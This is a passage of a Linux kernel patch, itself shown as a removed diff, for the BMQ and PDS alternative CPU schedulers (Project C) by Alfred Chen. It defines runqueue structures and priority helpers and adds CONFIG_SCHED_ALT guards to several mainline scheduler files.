-+
-+static inline int task_on_rq_migrating(struct task_struct *p)
-+{
-+	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
-+}
-+
-+/*
-+ * wake flags
-+ */
-+#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
-+#define WF_FORK		0x02		/* child wakeup after fork */
-+#define WF_MIGRATED	0x04		/* internal use, task got migrated */
-+
-+#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
-+
-+struct sched_queue {
-+	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
-+	struct list_head heads[SCHED_BITS];
-+};
-+
-+struct rq;
-+struct balance_callback {
-+	struct balance_callback *next;
-+	void (*func)(struct rq *rq);
-+};
-+
-+/*
-+ * This is the main, per-CPU runqueue data structure.
-+ * This data should only be modified by the local cpu.
-+ */
-+struct rq {
-+	/* runqueue lock: */
-+	raw_spinlock_t lock;
-+
-+	struct task_struct __rcu *curr;
-+	struct task_struct *idle, *stop, *skip;
-+	struct mm_struct *prev_mm;
-+
-+	struct sched_queue	queue;
-+#ifdef CONFIG_SCHED_PDS
-+	u64			time_edge;
-+#endif
-+	unsigned long prio;
-+
-+	/* switch count */
-+	u64 nr_switches;
-+
-+	atomic_t nr_iowait;
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	u64 last_seen_need_resched_ns;
-+	int ticks_without_resched;
-+#endif
-+
-+#ifdef CONFIG_MEMBARRIER
-+	int membarrier_state;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+	int cpu;		/* cpu of this runqueue */
-+	bool online;
-+
-+	unsigned int		ttwu_pending;
-+	unsigned char		nohz_idle_balance;
-+	unsigned char		idle_balance;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	struct sched_avg	avg_irq;
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+	int active_balance;
-+	struct cpu_stop_work	active_balance_work;
-+#endif
-+	struct balance_callback	*balance_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+	struct rcuwait		hotplug_wait;
-+#endif
-+	unsigned int		nr_pinned;
-+
-+#endif /* CONFIG_SMP */
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	u64 prev_irq_time;
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+#ifdef CONFIG_PARAVIRT
-+	u64 prev_steal_time;
-+#endif /* CONFIG_PARAVIRT */
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	u64 prev_steal_time_rq;
-+#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
-+
-+	/* For genenal cpu load util */
-+	s32 load_history;
-+	u64 load_block;
-+	u64 load_stamp;
-+
-+	/* calc_load related fields */
-+	unsigned long calc_load_update;
-+	long calc_load_active;
-+
-+	u64 clock, last_tick;
-+	u64 last_ts_switch;
-+	u64 clock_task;
-+
-+	unsigned int  nr_running;
-+	unsigned long nr_uninterruptible;
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+#ifdef CONFIG_SMP
-+	call_single_data_t hrtick_csd;
-+#endif
-+	struct hrtimer		hrtick_timer;
-+	ktime_t			hrtick_time;
-+#endif
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+	/* latency stats */
-+	struct sched_info rq_sched_info;
-+	unsigned long long rq_cpu_time;
-+	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
-+
-+	/* sys_sched_yield() stats */
-+	unsigned int yld_count;
-+
-+	/* schedule() stats */
-+	unsigned int sched_switch;
-+	unsigned int sched_count;
-+	unsigned int sched_goidle;
-+
-+	/* try_to_wake_up() stats */
-+	unsigned int ttwu_count;
-+	unsigned int ttwu_local;
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+#ifdef CONFIG_CPU_IDLE
-+	/* Must be inspected within a rcu lock section */
-+	struct cpuidle_state *idle_state;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#ifdef CONFIG_SMP
-+	call_single_data_t	nohz_csd;
-+#endif
-+	atomic_t		nohz_flags;
-+#endif /* CONFIG_NO_HZ_COMMON */
-+};
-+
-+extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
-+
-+extern unsigned long calc_load_update;
-+extern atomic_long_t calc_load_tasks;
-+
-+extern void calc_global_load_tick(struct rq *this_rq);
-+extern long calc_load_fold_active(struct rq *this_rq, long adjust);
-+
-+DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
-+#define this_rq()		this_cpu_ptr(&runqueues)
-+#define task_rq(p)		cpu_rq(task_cpu(p))
-+#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
-+#define raw_rq()		raw_cpu_ptr(&runqueues)
-+
-+#ifdef CONFIG_SMP
-+#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
-+void register_sched_domain_sysctl(void);
-+void unregister_sched_domain_sysctl(void);
-+#else
-+static inline void register_sched_domain_sysctl(void)
-+{
-+}
-+static inline void unregister_sched_domain_sysctl(void)
-+{
-+}
-+#endif
-+
-+extern bool sched_smp_initialized;
-+
-+enum {
-+	ITSELF_LEVEL_SPACE_HOLDER,
-+#ifdef CONFIG_SCHED_SMT
-+	SMT_LEVEL_SPACE_HOLDER,
-+#endif
-+	COREGROUP_LEVEL_SPACE_HOLDER,
-+	CORE_LEVEL_SPACE_HOLDER,
-+	OTHER_LEVEL_SPACE_HOLDER,
-+	NR_CPU_AFFINITY_LEVELS
-+};
-+
-+DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+
-+static inline int
-+__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
-+{
-+	int cpu;
-+
-+	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
-+		mask++;
-+
-+	return cpu;
-+}
-+
-+static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
-+{
-+	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
-+}
-+
-+extern void flush_smp_call_function_queue(void);
-+
-+#else  /* !CONFIG_SMP */
-+static inline void flush_smp_call_function_queue(void) { }
-+#endif
-+
-+#ifndef arch_scale_freq_tick
-+static __always_inline
-+void arch_scale_freq_tick(void)
-+{
-+}
-+#endif
-+
-+#ifndef arch_scale_freq_capacity
-+static __always_inline
-+unsigned long arch_scale_freq_capacity(int cpu)
-+{
-+	return SCHED_CAPACITY_SCALE;
-+}
-+#endif
-+
-+static inline u64 __rq_clock_broken(struct rq *rq)
-+{
-+	return READ_ONCE(rq->clock);
-+}
-+
-+static inline u64 rq_clock(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ, call to
-+	 * sched_info_xxxx() may not held rq->lock
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock;
-+}
-+
-+static inline u64 rq_clock_task(struct rq *rq)
-+{
-+	/*
-+	 * Relax lockdep_assert_held() checking as in VRQ, call to
-+	 * sched_info_xxxx() may not held rq->lock
-+	 * lockdep_assert_held(&rq->lock);
-+	 */
-+	return rq->clock_task;
-+}
-+
-+/*
-+ * {de,en}queue flags:
-+ *
-+ * DEQUEUE_SLEEP  - task is no longer runnable
-+ * ENQUEUE_WAKEUP - task just became runnable
-+ *
-+ */
-+
-+#define DEQUEUE_SLEEP		0x01
-+
-+#define ENQUEUE_WAKEUP		0x01
-+
-+
-+/*
-+ * Below are scheduler API which using in other kernel code
-+ * It use the dummy rq_flags
-+ * ToDo : BMQ need to support these APIs for compatibility with mainline
-+ * scheduler code.
-+ */
-+struct rq_flags {
-+	unsigned long flags;
-+};
-+
-+struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(rq->lock);
-+
-+struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
-+	__acquires(p->pi_lock)
-+	__acquires(rq->lock);
-+
-+static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
-+	__releases(rq->lock)
-+	__releases(p->pi_lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
-+}
-+
-+static inline void
-+rq_lock(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+static inline void
-+rq_lock_irq(struct rq *rq, struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	raw_spin_lock_irq(&rq->lock);
-+}
-+
-+static inline void
-+rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
-+	__releases(rq->lock)
-+{
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+static inline struct rq *
-+this_rq_lock_irq(struct rq_flags *rf)
-+	__acquires(rq->lock)
-+{
-+	struct rq *rq;
-+
-+	local_irq_disable();
-+	rq = this_rq();
-+	raw_spin_lock(&rq->lock);
-+
-+	return rq;
-+}
-+
-+static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
-+{
-+	return &rq->lock;
-+}
-+
-+static inline raw_spinlock_t *rq_lockp(struct rq *rq)
-+{
-+	return __rq_lockp(rq);
-+}
-+
-+static inline void lockdep_assert_rq_held(struct rq *rq)
-+{
-+	lockdep_assert_held(__rq_lockp(rq));
-+}
-+
-+extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
-+extern void raw_spin_rq_unlock(struct rq *rq);
-+
-+static inline void raw_spin_rq_lock(struct rq *rq)
-+{
-+	raw_spin_rq_lock_nested(rq, 0);
-+}
-+
-+static inline void raw_spin_rq_lock_irq(struct rq *rq)
-+{
-+	local_irq_disable();
-+	raw_spin_rq_lock(rq);
-+}
-+
-+static inline void raw_spin_rq_unlock_irq(struct rq *rq)
-+{
-+	raw_spin_rq_unlock(rq);
-+	local_irq_enable();
-+}
-+
-+static inline int task_current(struct rq *rq, struct task_struct *p)
-+{
-+	return rq->curr == p;
-+}
-+
-+static inline bool task_on_cpu(struct task_struct *p)
-+{
-+	return p->on_cpu;
-+}
-+
-+extern int task_running_nice(struct task_struct *p);
-+
-+extern struct static_key_false sched_schedstats;
-+
-+#ifdef CONFIG_CPU_IDLE
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+	rq->idle_state = idle_state;
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	WARN_ON(!rcu_read_lock_held());
-+	return rq->idle_state;
-+}
-+#else
-+static inline void idle_set_state(struct rq *rq,
-+				  struct cpuidle_state *idle_state)
-+{
-+}
-+
-+static inline struct cpuidle_state *idle_get_state(struct rq *rq)
-+{
-+	return NULL;
-+}
-+#endif
-+
-+static inline int cpu_of(const struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	return rq->cpu;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+#include "stats.h"
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#define NOHZ_BALANCE_KICK_BIT	0
-+#define NOHZ_STATS_KICK_BIT	1
-+
-+#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
-+#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
-+
-+#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
-+
-+#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
-+
-+/* TODO: needed?
-+extern void nohz_balance_exit_idle(struct rq *rq);
-+#else
-+static inline void nohz_balance_exit_idle(struct rq *rq) { }
-+*/
-+#endif
-+
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+struct irqtime {
-+	u64			total;
-+	u64			tick_delta;
-+	u64			irq_start_time;
-+	struct u64_stats_sync	sync;
-+};
-+
-+DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
-+
-+/*
-+ * Returns the irqtime minus the softirq time computed by ksoftirqd.
-+ * Otherwise ksoftirqd's sum_exec_runtime is substracted its own runtime
-+ * and never move forward.
-+ */
-+static inline u64 irq_time_read(int cpu)
-+{
-+	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
-+	unsigned int seq;
-+	u64 total;
-+
-+	do {
-+		seq = __u64_stats_fetch_begin(&irqtime->sync);
-+		total = irqtime->total;
-+	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
-+
-+	return total;
-+}
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+
-+#ifdef CONFIG_CPU_FREQ
-+DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+extern int __init sched_tick_offload_init(void);
-+#else
-+static inline int sched_tick_offload_init(void) { return 0; }
-+#endif
-+
-+#ifdef arch_scale_freq_capacity
-+#ifndef arch_scale_freq_invariant
-+#define arch_scale_freq_invariant()	(true)
-+#endif
-+#else /* arch_scale_freq_capacity */
-+#define arch_scale_freq_invariant()	(false)
-+#endif
-+
-+extern void schedule_idle(void);
-+
-+#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
-+
-+/*
-+ * !! For sched_setattr_nocheck() (kernel) only !!
-+ *
-+ * This is actually gross. :(
-+ *
-+ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
-+ * tasks, but still be able to sleep. We need this on platforms that cannot
-+ * atomically change clock frequency. Remove once fast switching will be
-+ * available on such platforms.
-+ *
-+ * SUGOV stands for SchedUtil GOVernor.
-+ */
-+#define SCHED_FLAG_SUGOV	0x10000000
-+
-+#ifdef CONFIG_MEMBARRIER
-+/*
-+ * The scheduler provides memory barriers required by membarrier between:
-+ * - prior user-space memory accesses and store to rq->membarrier_state,
-+ * - store to rq->membarrier_state and following user-space memory accesses.
-+ * In the same way it provides those guarantees around store to rq->curr.
-+ */
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+	int membarrier_state;
-+
-+	if (prev_mm == next_mm)
-+		return;
-+
-+	membarrier_state = atomic_read(&next_mm->membarrier_state);
-+	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
-+		return;
-+
-+	WRITE_ONCE(rq->membarrier_state, membarrier_state);
-+}
-+#else
-+static inline void membarrier_switch_mm(struct rq *rq,
-+					struct mm_struct *prev_mm,
-+					struct mm_struct *next_mm)
-+{
-+}
-+#endif
-+
-+#ifdef CONFIG_NUMA
-+extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
-+#else
-+static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
-+{
-+	return nr_cpu_ids;
-+}
-+#endif
-+
-+extern void swake_up_all_locked(struct swait_queue_head *q);
-+extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+extern int preempt_dynamic_mode;
-+extern int sched_dynamic_mode(const char *str);
-+extern void sched_dynamic_update(int mode);
-+#endif
-+
-+static inline void nohz_run_idle_balance(int cpu) { }
-+
-+static inline
-+unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
-+				  struct task_struct *p)
-+{
-+	return util;
-+}
-+
-+static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
-+
-+#endif /* ALT_SCHED_H */
-diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
-new file mode 100644
-index 000000000000..66b77291b9d0
---- /dev/null
-+++ b/kernel/sched/bmq.h
-@@ -0,0 +1,110 @@
-+#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+/*
-+ * BMQ only routines
-+ */
-+#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
-+#define boost_threshold(p)	(sched_timeslice_ns >>\
-+				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
-+
-+static inline void boost_task(struct task_struct *p)
-+{
-+	int limit;
-+
-+	switch (p->policy) {
-+	case SCHED_NORMAL:
-+		limit = -MAX_PRIORITY_ADJ;
-+		break;
-+	case SCHED_BATCH:
-+	case SCHED_IDLE:
-+		limit = 0;
-+		break;
-+	default:
-+		return;
-+	}
-+
-+	if (p->boost_prio > limit)
-+		p->boost_prio--;
-+}
-+
-+static inline void deboost_task(struct task_struct *p)
-+{
-+	if (p->boost_prio < MAX_PRIORITY_ADJ)
-+		p->boost_prio++;
-+}
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms) {}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	return p->prio + p->boost_prio - MAX_RT_PRIO;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO)? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return task_sched_prio(p);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return prio;
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return idx;
-+}
-+
-+static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
-+{
-+	p->time_slice = sched_timeslice_ns;
-+
-+	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
-+		if (SCHED_RR != p->policy)
-+			deboost_task(p);
-+		requeue_task(p, rq, task_sched_prio_idx(p, rq));
-+	}
-+}
-+
-+static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
-+
-+inline int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
-+}
-+
-+static void sched_task_fork(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
-+{
-+	p->boost_prio = MAX_PRIORITY_ADJ;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline void sched_task_ttwu(struct task_struct *p)
-+{
-+	if(this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
-+		boost_task(p);
-+}
-+#endif
-+
-+static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
-+{
-+	if (rq_switch_time(rq) < boost_threshold(p))
-+		boost_task(p);
-+}
-+
-+static inline void update_rq_time_edge(struct rq *rq) {}
-diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
-index d9dc9ab3773f..71a25540d65e 100644
---- a/kernel/sched/build_policy.c
-+++ b/kernel/sched/build_policy.c
-@@ -42,13 +42,19 @@
-
- #include "idle.c"
-
-+#ifndef CONFIG_SCHED_ALT
- #include "rt.c"
-+#endif
-
- #ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- # include "cpudeadline.c"
-+#endif
- # include "pelt.c"
- #endif
-
- #include "cputime.c"
--#include "deadline.c"
-
-+#ifndef CONFIG_SCHED_ALT
-+#include "deadline.c"
-+#endif
-diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
-index 99bdd96f454f..23f80a86d2d7 100644
---- a/kernel/sched/build_utility.c
-+++ b/kernel/sched/build_utility.c
-@@ -85,7 +85,9 @@
-
- #ifdef CONFIG_SMP
- # include "cpupri.c"
-+#ifndef CONFIG_SCHED_ALT
- # include "stop_task.c"
-+#endif
- # include "topology.c"
- #endif
-
-diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
-index 1207c78f85c1..68812e0756cb 100644
---- a/kernel/sched/cpufreq_schedutil.c
-+++ b/kernel/sched/cpufreq_schedutil.c
-@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
- 	struct rq *rq = cpu_rq(sg_cpu->cpu);
-
- 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
-+#ifndef CONFIG_SCHED_ALT
- 	sg_cpu->bw_dl = cpu_bw_dl(rq);
- 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
- 					  FREQUENCY_UTIL, NULL);
-+#else
-+	sg_cpu->bw_dl = 0;
-+	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
-+#endif /* CONFIG_SCHED_ALT */
- }
-
- /**
-@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
-  */
- static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
- 		sg_cpu->sg_policy->limits_changed = true;
-+#endif
- }
-
- static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
-@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
- 	}
-
- 	ret = sched_setattr_nocheck(thread, &attr);
-+
- 	if (ret) {
- 		kthread_stop(thread);
- 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
-@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
- #ifdef CONFIG_ENERGY_MODEL
- static void rebuild_sd_workfn(struct work_struct *work)
- {
-+#ifndef CONFIG_SCHED_ALT
- 	rebuild_sched_domains_energy();
-+#endif /* CONFIG_SCHED_ALT */
- }
- static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
-
-diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
-index 95fc77853743..b48b3f9ed47f 100644
---- a/kernel/sched/cputime.c
-+++ b/kernel/sched/cputime.c
-@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
- 	p->utime += cputime;
- 	account_group_user_time(p, cputime);
-
--	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
-+	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
-
- 	/* Add user time to cpustat. */
- 	task_group_account_field(p, index, cputime);
-@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
- 	p->gtime += cputime;
-
- 	/* Add guest time to cpustat. */
--	if (task_nice(p) > 0) {
-+	if (task_running_nice(p)) {
- 		task_group_account_field(p, CPUTIME_NICE, cputime);
- 		cpustat[CPUTIME_GUEST_NICE] += cputime;
- 	} else {
-@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
- #ifdef CONFIG_64BIT
- static inline u64 read_sum_exec_runtime(struct task_struct *t)
- {
--	return t->se.sum_exec_runtime;
-+	return tsk_seruntime(t);
- }
- #else
- static u64 read_sum_exec_runtime(struct task_struct *t)
-@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
- 	struct rq *rq;
-
- 	rq = task_rq_lock(t, &rf);
--	ns = t->se.sum_exec_runtime;
-+	ns = tsk_seruntime(t);
- 	task_rq_unlock(rq, t, &rf);
-
- 	return ns;
-@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
- void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
- {
- 	struct task_cputime cputime = {
--		.sum_exec_runtime = p->se.sum_exec_runtime,
-+		.sum_exec_runtime = tsk_seruntime(p),
- 	};
-
- 	if (task_cputime(p, &cputime.utime, &cputime.stime))
-diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
-index 1637b65ba07a..033c6deeb515 100644
---- a/kernel/sched/debug.c
-+++ b/kernel/sched/debug.c
-@@ -7,6 +7,7 @@
-  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
-  */
-
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * This allows printing both to /proc/sched_debug and
-  * to the console
-@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
- };
-
- #endif /* SMP */
-+#endif /* !CONFIG_SCHED_ALT */
-
- #ifdef CONFIG_PREEMPT_DYNAMIC
-
-@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
-
- #endif /* CONFIG_PREEMPT_DYNAMIC */
-
-+#ifndef CONFIG_SCHED_ALT
- __read_mostly bool sched_debug_verbose;
-
- static const struct seq_operations sched_debug_sops;
-@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
- 	.llseek		= seq_lseek,
- 	.release	= seq_release,
- };
-+#endif /* !CONFIG_SCHED_ALT */
-
- static struct dentry *debugfs_sched;
-
-@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
-
- 	debugfs_sched = debugfs_create_dir("sched", NULL);
-
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
- 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
-+#endif /* !CONFIG_SCHED_ALT */
- #ifdef CONFIG_PREEMPT_DYNAMIC
- 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
- #endif
-
-+#ifndef CONFIG_SCHED_ALT
- 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
- 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
- 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
-@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
- #endif
-
- 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
-+#endif /* !CONFIG_SCHED_ALT */
-
- 	return 0;
- }
- late_initcall(sched_init_debug);
-
-+#ifndef CONFIG_SCHED_ALT
- #ifdef CONFIG_SMP
-
- static cpumask_var_t		sd_sysctl_cpus;
-@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
- 	memset(&p->stats, 0, sizeof(p->stats));
- #endif
- }
-+#endif /* !CONFIG_SCHED_ALT */
-
- void resched_latency_warn(int cpu, u64 latency)
- {
-diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
-index f26ab2675f7d..480d4ad16d45 100644
---- a/kernel/sched/idle.c
-+++ b/kernel/sched/idle.c
-@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
- 		do_idle();
- }
-
-+#ifndef CONFIG_SCHED_ALT
- /*
-  * idle-task scheduling class.
-  */
-@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
- 	.switched_to		= switched_to_idle,
- 	.update_curr		= update_curr_idle,
- };
-+#endif
-diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
-new file mode 100644
-index 000000000000..56a649d02e49
---- /dev/null
-+++ b/kernel/sched/pds.h
-@@ -0,0 +1,127 @@
-+#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
-+
-+static int sched_timeslice_shift = 22;
-+
-+#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
-+
-+/*
-+ * Common interfaces
-+ */
-+static inline void sched_timeslice_imp(const int timeslice_ms)
-+{
-+	if (2 == timeslice_ms)
-+		sched_timeslice_shift = 21;
-+}
-+
-+static inline int
-+task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
-+{
-+	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
-+
-+	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
-+		      "pds: task_sched_prio_normal() delta %lld\n", delta))
-+		return NORMAL_PRIO_NUM - 1;
-+
-+	return (delta < 0) ? 0 : delta;
-+}
-+
-+static inline int task_sched_prio(const struct task_struct *p)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio :
-+		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
-+}
-+
-+static inline int
-+task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
-+{
-+	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
-+}
-+
-+static inline int sched_prio2idx(int prio, struct rq *rq)
-+{
-+	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
-+		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
-+						  rq->time_edge);
-+}
-+
-+static inline int sched_idx2prio(int idx, struct rq *rq)
-+{
-+	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
-+		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
-+				NORMAL_PRIO_MOD(rq->time_edge));
-+}
-+
-+static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
-+{
-+	if (p->prio >= MAX_RT_PRIO)
-+		p->deadline = (rq->clock >> sched_timeslice_shift) +
-+			p->static_prio - (MAX_PRIO - NICE_WIDTH);
-+}
-+
-+int task_running_nice(struct task_struct *p)
-+{
-+	return (p->prio > DEFAULT_PRIO);
-+}
-+
